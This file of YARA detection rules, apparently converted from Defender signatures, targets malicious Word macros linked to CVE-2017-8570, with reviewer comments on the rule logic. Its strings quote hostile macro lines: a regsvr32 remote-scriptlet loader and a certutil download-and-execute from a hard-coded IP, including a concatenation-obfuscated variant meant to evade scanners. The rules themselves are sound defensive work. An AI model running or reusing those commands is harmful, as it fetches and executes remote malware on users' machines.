
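// Converted Defender signature Exploit:O97M/CVE-2017-8570!MTB (first variant).
//
// Two corrections to the mechanical conversion:
//  1. The original rule name contained hyphens ("CVE-2017-8570"). A hyphen is not a
//     legal character in a YARA identifier, so the rule as emitted does not compile;
//     the name is spelled with underscores here. Keep the old spelling only in
//     file names / documentation.
//  2. The condition was `any of ($a_*)`, which let the generic `Dim shell` or
//     `"Fatal error!")` fragment alone produce a CVE-2017-8570 verdict. The trailing
//     bytes of `description` are the Defender MACROHSTR_EXT header; they read like a
//     weighted threshold (04 00 04 00 04 00 ... with every string annotated 01 00,
//     i.e. all four strings needed) -- TODO confirm against the MACROHSTR_EXT layout.
//     The condition below lets the loader command line fire on its own and requires
//     the three weak strings to corroborate each other.
//
// NOTE(review): the strings are VBA macro text, not the OLE/moniker structures
// CVE-2017-8570 itself abuses; treat this as a sample-family signature, not a
// structural exploit detection.
rule Exploit_O97M_CVE_2017_8570_MTB{
    meta:
        description = "Exploit:O97M/CVE-2017-8570!MTB,SIGNATURE_TYPE_MACROHSTR_EXT,04 00 04 00 04 00 00 01 00 "
    strings:
        // Loader: "regsvr32 /u /n /s /i:<url>.sct scrobj.dll" (remote scriptlet execution
        // via a signed binary). The host is 127.0.0.1, so this looks like a lab / PoC
        // build; in-the-wild variants with another URL will NOT hit this string -- hunt
        // for the regsvr32 /i:http ... scrobj.dll command line in process telemetry as well.
        $a_01_0 = {73 68 65 6c 6c 2e 52 75 6e 28 22 72 65 67 73 76 72 33 32 20 2f 75 20 2f 6e 20 2f 73 20 2f 69 3a 68 74 74 70 3a 2f 2f 31 32 37 2e 30 2e 30 2e 31 2f 70 61 79 6c 6f 6f 6f 61 64 2e 73 63 74 20 73 63 72 6f 62 6a 2e 64 6c 6c 22 2c 20 30 2c 20 46 61 6c 73 65 29 } //01 00 shell.Run("regsvr32 /u /n /s /i:http://127.0.0.1/payloooad.sct scrobj.dll", 0, False)
        // Decoy error dialog shown to the victim after the loader runs (presumably; the
        // surrounding macro is not visible here).
        $a_01_1 = {43 61 6c 6c 20 4d 73 67 42 6f 78 28 22 48 6f 75 73 74 6f 6e 2c 20 77 65 27 76 65 20 68 61 64 20 61 20 70 72 6f 62 6c 65 6d 21 22 20 26 20 76 62 4e 65 77 4c 69 6e 65 20 26 20 22 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 70 72 6f 63 65 73 73 69 6e 67 20 65 72 72 6f 72 2e 22 } //01 00 Call MsgBox("Houston, we've had a problem!" & vbNewLine & "Microsoft Word processing error."
        // Tail of the same MsgBox call; generic on its own.
        $a_01_2 = {22 46 61 74 61 6c 20 65 72 72 6f 72 21 22 29 } //01 00 "Fatal error!")
        // Plain VBA declaration; occurs in countless benign macros, never sufficient alone.
        $a_01_3 = {44 69 6d 20 73 68 65 6c 6c } //00 00 Dim shell
    condition:
        // High-signal loader line alone, or all three weak strings together.
        $a_01_0 or all of ($a_01_1, $a_01_2, $a_01_3)
}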
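// Converted Defender signature Exploit:O97M/CVE-2017-8570!MTB (second variant).
//
// Two corrections to the mechanical conversion:
//  1. The original rule name contained hyphens ("CVE-2017-8570"), which YARA does not
//     accept in identifiers, so the rule as emitted does not compile; spelled with
//     underscores here.
//  2. The condition was `any of ($a_*)`, discarding the weighting encoded in the
//     Defender MACROHSTR_EXT header (07 00 07 00 06 00 ... with per-string annotations
//     04 00, 04 00, 01 00, 01 00, 01 00). Read as threshold 7 over six strings, the
//     original required either both command-line strings or one of them plus the
//     low-weight strings -- TODO confirm against the MACROHSTR_EXT layout. The
//     condition below lets any of the three LOLBin command lines (each with a
//     hard-coded host) fire alone and requires the three low-weight strings to
//     corroborate each other. Re-check the FP rate of firing on a single command line
//     before deploying in block mode.
//
// NOTE(review): the strings are VBA macro text, not the OLE/moniker structures
// CVE-2017-8570 itself abuses; this is a sample-family signature.
rule Exploit_O97M_CVE_2017_8570_MTB_2{
    meta:
        description = "Exploit:O97M/CVE-2017-8570!MTB,SIGNATURE_TYPE_MACROHSTR_EXT,07 00 07 00 06 00 00 04 00 "
    strings:
        // regsvr32 remote-scriptlet loader (scrobj.dll) fetching 1.sct from 185.104.114.115.
        $a_01_0 = {2f 75 20 2f 6e 20 2f 73 20 2f 69 3a 68 74 74 70 3a 2f 2f 31 38 35 2e 31 30 34 2e 31 31 34 2e 31 31 35 2f 31 2e 73 63 74 20 73 63 72 6f 62 6a 2e 64 6c 6c 22 2c 20 30 2c 20 46 61 6c 73 65 29 } //04 00 /u /n /s /i:http://185.104.114.115/1.sct scrobj.dll", 0, False)
        // certutil -urlcache download-and-execute of 123.exe from the same host.
        $a_01_1 = {2e 52 75 6e 20 28 22 63 6d 64 2e 65 78 65 20 2f 63 20 63 65 72 74 75 74 69 6c 2e 65 78 65 20 2d 75 72 6c 63 61 63 68 65 20 2d 73 70 6c 69 74 20 2d 66 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 30 34 2e 31 31 34 2e 31 31 35 2f 31 32 33 2e 65 78 65 20 73 64 66 73 64 66 2e 65 78 65 20 26 26 20 73 74 61 72 74 20 73 64 66 73 64 66 2e 65 78 65 22 29 } //04 00 .Run ("cmd.exe /c certutil.exe -urlcache -split -f http://185.104.114.115/123.exe sdfsdf.exe && start sdfsdf.exe")
        // Same certutil command, but with the keywords split across string concatenations
        // ("cer" + "tutil.exe", "-url" + "cache") to defeat naive substring scanners.
        // $a_01_1 and $a_01_2 are mutually exclusive on a given byte range.
        $a_01_2 = {2e 52 75 6e 20 28 22 63 6d 64 2e 65 78 65 20 2f 63 20 63 65 72 22 20 2b 20 22 74 75 74 69 6c 2e 65 78 65 20 2d 75 72 6c 22 20 2b 20 22 63 61 63 68 65 20 2d 73 70 22 20 2b 20 22 6c 69 74 20 2d 66 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 30 34 2e 31 31 34 2e 31 31 35 2f 31 32 33 2e 65 78 65 20 73 64 66 73 64 66 2e 65 78 65 20 26 26 20 73 74 61 72 74 } //01 00 .Run ("cmd.exe /c cer" + "tutil.exe -url" + "cache -sp" + "lit -f http://185.104.114.115/123.exe sdfsdf.exe && start
        // WMI StdRegProv registry provider obtained with the namespace split by concatenation;
        // presumably used to read or write registry keys, but the use is not visible here.
        $a_01_3 = {53 65 74 20 6f 52 65 67 20 3d 20 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 7b 69 6d 70 65 72 73 6f 6e 61 74 69 6f 6e 4c 65 76 65 6c 3d 69 6d 70 65 72 73 6f 6e 61 74 65 7d 21 5c 5c 2e 5c 72 6f 22 20 2b 20 22 6f 74 5c 64 65 66 61 75 6c 74 3a 22 20 2b 20 22 53 74 64 52 65 67 50 72 6f 76 22 29 } //01 00 Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\ro" + "ot\default:" + "StdRegProv")
        // Decoy error text presented to the victim.
        $a_01_4 = {6d 73 67 20 3d 20 22 54 68 69 73 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 61 70 70 65 61 72 73 20 74 6f 20 62 65 20 6d 61 64 65 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 20 66 6f 72 6d 61 74 2e 20 5b 45 72 72 6f 72 20 43 6f 64 65 3a 20 2d 32 32 39 5d } //01 00 msg = "This application appears to be made not supported format. [Error Code: -229]
        // Variable declaration specific to this sample; weak evidence on its own.
        $a_01_5 = {44 69 6d 20 73 68 65 61 73 64 6c 6c } //00 00 Dim sheasdll
    condition:
        // Any LOLBin command line alone, or all three low-weight strings together.
        any of ($a_01_0, $a_01_1, $a_01_2) or all of ($a_01_3, $a_01_4, $a_01_5)
}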